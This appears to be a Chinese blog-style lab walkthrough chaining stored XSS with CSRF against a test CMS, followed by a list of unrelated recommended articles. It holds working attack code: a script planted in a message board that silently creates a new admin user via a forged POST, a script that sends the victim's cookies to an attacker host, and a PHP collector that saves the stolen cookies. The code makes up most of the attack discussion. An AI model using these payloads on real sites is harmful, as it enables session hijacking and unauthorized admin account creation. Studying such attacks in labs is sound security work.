csrf+xss组合拳

csrf+xss组合拳

一、环境搭建

靶场cms文章管理系统

二、流程开始

这是系统前端

系统管理后台

而我们要打到后台管理员的cookie,结合前端存储型的xss完全可以实现,那后端怎么被打到cookie呢,我们来从这里添加用户开始分析数据包来说明

看看数据包。其中提交的字段是act=add(添加),username、password

那我们通过编写恶意js

复制代码
<script>
var xmlhttp = new XMLHttpRequest(); 
xmlhttp.open("POST", "http://192.168.137.45/cms/cms/admin/user.action.php", false); 
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 
xmlhttp.send("act=add&username=waou&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0"); 
</script>

寻找前端存储型xss,在这里留言板

去后台查看很明显插入了

我们把我书写的恶意js插入进去,这段恶意js创建的是waou用户,插入看看吧

插入成功

看看结果waou是否被创建

成功,不一定添加管理员,也可以盗取cookie,这个漏洞的最大问题还是存储型漏洞,这个框架也没用csrf防御的tokle值,所以导致管理员点击后直接创建新管理员

盗取cookie:

复制代码
<script>
    var cookie = document.cookie;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "http://192.168.137.45/ceshi/cookie.php?cookie=" + encodeURIComponent(cookie), true);
    xhr.send();
</script>

攻击机192.168.137.45接收

复制代码
<?php
if (isset($_GET['cookie'])) {
    $cookie = $_GET['cookie'];
    $file = 'cookie.txt';
    if (file_put_contents($file, $cookie) !== false) {
        echo "Cookie has been saved to cookie.txt";
    } else {
        echo "Failed to save cookie.";
    }
} else {
    echo "No cookie received.";
}
?>

访问之后可以看到cookie已经被盗取

相关推荐
麦兜*2 小时前
Spring Boot 与 Ollama 集成部署私有LLM服务 的完整避坑指南,涵盖 环境配置、模型管理、性能优化 和 安全加固
java·spring boot·后端·安全·spring cloud·性能优化
athink_cn2 小时前
【紧急预警】NVIDIA Triton推理服务器漏洞链可导致RCE!
人工智能·安全·网络安全·ai
dingzd955 小时前
从传统架构到创新安全:Web2.0与Web3.0的比较分析
安全·架构·web3·facebook·tiktok·instagram·clonbrowser
q__y__L10 小时前
C#线程同步(三)线程安全
安全·性能优化·c#
大学在校生,求offer联系17 小时前
墨者学院SQL过滤字符后手工绕过漏洞测试(万能口令)
安全
字节跳动安全中心18 小时前
猎影计划:从密流中捕获 Cobalt Strike 的隐秘身影
人工智能·安全·llm
集成显卡18 小时前
网络安全 | 从 0 到 1 了解 WAF:Web 应用防火墙到底是什么?
网络·安全·web安全
FreeBuf_18 小时前
AI Agents漏洞百出,恶意提示等安全缺陷令人担忧
人工智能·安全
AORO202520 小时前
国产智能三防手机哪款最好?这款支持单北斗、5G-A、IP68
5g·安全·智能手机·信息与通信·harmonyos
wanhengidc20 小时前
进一步分析云手机的优势有哪些?
网络·安全·智能手机